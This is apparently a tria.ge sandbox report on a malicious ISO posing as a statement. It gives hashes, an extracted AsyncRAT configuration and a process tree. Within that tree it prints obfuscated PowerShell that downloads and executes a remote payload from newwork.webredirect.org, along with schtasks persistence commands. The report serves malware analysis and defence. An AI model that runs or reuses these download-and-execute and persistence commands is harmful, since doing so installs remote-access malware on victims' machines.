Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
11/07/2024, 21:49
Static task
static1
General
-
Target
Statment#924869506.iso
-
Size
1.4MB
-
MD5
4b0aa2a63703f774aa8687300200a04d
-
SHA1
af1118e88a4aad29bbc8760ed2f1b7a7a5017042
-
SHA256
8dda70b17eda9096c62343eec5f60a3ed132f66a6f3d2e58c39afbad7280e9bc
-
SHA512
ab280a85edbec30283be854fc1ebce7936561ffc00d0108411f65e4b6508c586875448db31c78686275c9aeae2aba5649ff6acafc73047608ebc269190e84bdc
-
SSDEEP
384:6BP01dUB7P1dUB7OpnIUAkgko0oUQEwEo0i5UAEgEo0oUwkQko0IUAkgko0oUQEu:6d01dE7P1dE7OpCAtVAi
Malware Config
Extracted
asyncrat
AWS | 3Losh
Elsa3eed
AsyncMutex_alosh
-
delay
3
-
install
false
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/C7vDhgZQ
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 43 4148 WScript.exe 49 2132 powershell.exe 50 1912 powershell.exe 56 2132 powershell.exe 62 1912 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 2132 powershell.exe 1912 powershell.exe 3436 powershell.exe 4792 powershell.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates connected drives 3 TTPs 3 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: Notepad.exe File opened (read-only) \??\E: WScript.exe File opened (read-only) \??\E: WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 51 pastebin.com 52 pastebin.com -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3436 set thread context of 4820 3436 powershell.exe 104 PID 4792 set thread context of 3504 4792 powershell.exe 113 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2260 schtasks.exe 3540 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2132 powershell.exe 2132 powershell.exe 3436 powershell.exe 3436 powershell.exe 3436 powershell.exe 3436 powershell.exe 1912 powershell.exe 1912 powershell.exe 4820 aspnet_compiler.exe 4792 powershell.exe 4792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeManageVolumePrivilege 4188 cmd.exe Token: SeManageVolumePrivilege 4188 cmd.exe Token: SeDebugPrivilege 2132 powershell.exe Token: SeDebugPrivilege 3436 powershell.exe Token: SeDebugPrivilege 1912 powershell.exe Token: SeDebugPrivilege 4820 aspnet_compiler.exe Token: SeDebugPrivilege 4792 powershell.exe Token: SeIncreaseQuotaPrivilege 2132 powershell.exe Token: SeSecurityPrivilege 2132 powershell.exe Token: SeTakeOwnershipPrivilege 2132 powershell.exe Token: SeLoadDriverPrivilege 2132 powershell.exe Token: SeSystemProfilePrivilege 2132 powershell.exe Token: SeSystemtimePrivilege 2132 powershell.exe Token: SeProfSingleProcessPrivilege 2132 powershell.exe Token: SeIncBasePriorityPrivilege 2132 powershell.exe Token: SeCreatePagefilePrivilege 2132 powershell.exe Token: SeBackupPrivilege 2132 powershell.exe Token: SeRestorePrivilege 2132 powershell.exe Token: SeShutdownPrivilege 2132 powershell.exe Token: SeDebugPrivilege 2132 powershell.exe Token: SeSystemEnvironmentPrivilege 2132 powershell.exe Token: SeRemoteShutdownPrivilege 2132 powershell.exe Token: SeUndockPrivilege 2132 powershell.exe Token: SeManageVolumePrivilege 2132 powershell.exe Token: 33 2132 powershell.exe Token: 34 2132 powershell.exe Token: 35 2132 powershell.exe Token: 36 2132 powershell.exe Token: SeIncreaseQuotaPrivilege 1912 powershell.exe Token: SeSecurityPrivilege 1912 powershell.exe Token: SeTakeOwnershipPrivilege 1912 powershell.exe Token: SeLoadDriverPrivilege 1912 powershell.exe Token: SeSystemProfilePrivilege 1912 powershell.exe Token: SeSystemtimePrivilege 1912 powershell.exe Token: SeProfSingleProcessPrivilege 1912 powershell.exe Token: SeIncBasePriorityPrivilege 1912 powershell.exe Token: SeCreatePagefilePrivilege 1912 powershell.exe Token: SeBackupPrivilege 1912 powershell.exe Token: SeRestorePrivilege 1912 powershell.exe Token: SeShutdownPrivilege 1912 powershell.exe Token: SeDebugPrivilege 1912 powershell.exe Token: SeSystemEnvironmentPrivilege 1912 powershell.exe Token: SeRemoteShutdownPrivilege 1912 powershell.exe Token: SeUndockPrivilege 1912 powershell.exe Token: SeManageVolumePrivilege 1912 powershell.exe Token: 33 1912 powershell.exe Token: 34 1912 powershell.exe Token: 35 1912 powershell.exe Token: 36 1912 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4820 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 4148 wrote to memory of 2132 4148 WScript.exe 96 PID 4148 wrote to memory of 2132 4148 WScript.exe 96 PID 2132 wrote to memory of 2260 2132 powershell.exe 98 PID 2132 wrote to memory of 2260 2132 powershell.exe 98 PID 2132 wrote to memory of 3652 2132 powershell.exe 99 PID 2132 wrote to memory of 3652 2132 powershell.exe 99 PID 4632 wrote to memory of 3436 4632 WScript.exe 101 PID 4632 wrote to memory of 3436 4632 WScript.exe 101 PID 3436 wrote to memory of 1836 3436 powershell.exe 103 PID 3436 wrote to memory of 1836 3436 powershell.exe 103 PID 3436 wrote to memory of 1836 3436 powershell.exe 103 PID 3436 wrote to memory of 4820 3436 powershell.exe 104 PID 3436 wrote to memory of 4820 3436 powershell.exe 104 PID 3436 wrote to memory of 4820 3436 powershell.exe 104 PID 3436 wrote to memory of 4820 3436 powershell.exe 104 PID 3436 wrote to memory of 4820 3436 powershell.exe 104 PID 3436 wrote to memory of 4820 3436 powershell.exe 104 PID 3436 wrote to memory of 4820 3436 powershell.exe 104 PID 3436 wrote to memory of 4820 3436 powershell.exe 104 PID 2348 wrote to memory of 1912 2348 WScript.exe 106 PID 2348 wrote to memory of 1912 2348 WScript.exe 106 PID 1912 wrote to memory of 3540 1912 powershell.exe 108 PID 1912 wrote to memory of 3540 1912 powershell.exe 108 PID 1912 wrote to memory of 1876 1912 powershell.exe 109 PID 1912 wrote to memory of 1876 1912 powershell.exe 109 PID 2408 wrote to memory of 4792 2408 WScript.exe 111 PID 2408 wrote to memory of 4792 2408 WScript.exe 111 PID 4792 wrote to memory of 3504 4792 powershell.exe 113 PID 4792 wrote to memory of 3504 4792 powershell.exe 113 PID 4792 wrote to memory of 3504 4792 powershell.exe 113 PID 4792 wrote to memory of 3504 4792 powershell.exe 113 PID 4792 wrote to memory of 3504 4792 powershell.exe 113 PID 4792 wrote to memory of 3504 4792 powershell.exe 113 PID 4792 wrote to memory of 3504 4792 powershell.exe 113 PID 4792 wrote to memory of 3504 4792 powershell.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Statment#924869506.iso1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2176
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" E:\Statment#014095818.wsf1⤵
- Enumerates connected drives
PID:4344
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "E:\Statment#014095818.wsf"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://newwork.webredirect.org:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic23⤵
- Scheduled Task/Job: Scheduled Task
PID:2260
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Run /TN TvMusic23⤵PID:3652
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵PID:1836
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4820
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "E:\Statment#014095818.wsf"1⤵
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://newwork.webredirect.org:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic23⤵
- Scheduled Task/Job: Scheduled Task
PID:3540
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Run /TN TvMusic23⤵PID:1876
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵PID:3504
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\5G8JI3LV\011011101110100000010101010001110010010101101110111010000001010[1]
Filesize5KB
MD5b1a2ef3cb17547bd40e90d8d5df339f9
SHA15b47f0796d0526025e58843e76355237e9ae7bb9
SHA256ff47b96082b5aa66043090a8e902b85e04bd6355b0c2d031b6b26b64e5d3ce7f
SHA512393bd4b01405d9c91478adfcb132f1ba194a4b166649d5bf5d0b385f48edfa6268869ec21ba3c8734566008688b386c63855a9b66a1fd810a7e8048a1524dcde
-
Filesize
1KB
MD56fe7f2ff9f024b0658a4113e39b826fc
SHA107a0d4ec3b19b62fd409ddb60e843021ac40f1f3
SHA256e8f1c76e1435d42070f4d6c600c2301710b291674c00ef9c069508f0fea69cf1
SHA51264448c79c9070cbc179df72420c1d86d10ea2ff8ae0d9c3fed5676851cb45a64e65a9d637a1f8f41ecf4dc51c3d5ff8a689519d9ea13d9837b3f9cfaddd13979
-
Filesize
1KB
MD53aeb291817e68548c1769a0a696b593e
SHA1a7c09a946b1c0ea9d8891b58c162b1e2920b0cec
SHA256dbe7bbb781971a705434da18b898aafd5d63247cda23fe34c4080f1a8760b74e
SHA5127602ca1281ffde573be783369a975dfe6fef6a4fe00738f162cef29ce8115b8b5c1297855ae2707e1aabad158cd154cc3f893d3c66e4ef0cf4d5b48a1c36873c
-
Filesize
856B
MD5ec4f2ab7f8d5f6be729ff9dfaa5c6a70
SHA1760c281609a80d3b0a3d023aafb9d96da7b16e8e
SHA2561eec5a02da8a948b0f3d762ca05eaca1efd32c7af3ea0536b6cf905e27aef3e7
SHA512773feafee4ad24d1965c625219d730b19a7a0c3e8d650c5a1d102dfd1c6f5e9433c4f2583ead095812faf91ed87c45a3d4299f61474dc2fc762382a31e1b0562
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD526913303151afee791eb652db6764fe2
SHA149418253140caeacb2a1b5bfac48f4bc8e8d5b24
SHA25614c815402dddbe953b9fd494e873d453251b3ec6ad996f5000174882040ba248
SHA5125e7b1045e34f0f39303dfecc0e601b8212b32acfa466642db1f4e9a0332fbdaffc5762aaf252385d974a1dd37f062e424a3fda5cad5317b1128dbd5b66f09141
-
Filesize
452KB
MD56c396a8cfe36cbdc7eb72c2f6c8b2346
SHA16078599b7406607c848e56e162ea79a691a2aff4
SHA2569f60cdba09c697e1277f56435afaa9a7922e62a53d87f44d2cf1eeef2eacbaf8
SHA5127a79bf3d19e5949df8ecba34339b922c73c3464747b8348e4908859f76c756e8a3c710873b84253ebedc846e83203f0ca72c46b9e6a06cb1a5dfd6ae32aced0b
-
Filesize
229B
MD566a1516e1d1e821084441211567d2e87
SHA10e688c9a93ad2cc162ef48ca75e0148e69d95ab1
SHA256d57293641ff05fea6af21fb73a4064eca49e5979f2395305bdea2a00a5de6717
SHA5121b77505b03a4a9c2c9437fbb94e828f34ed5b74187a258443af778b9450dc346e7027267e4ad6d33ff96c4036d936eba9dee05efbe136678bec6d0f7b68ecf12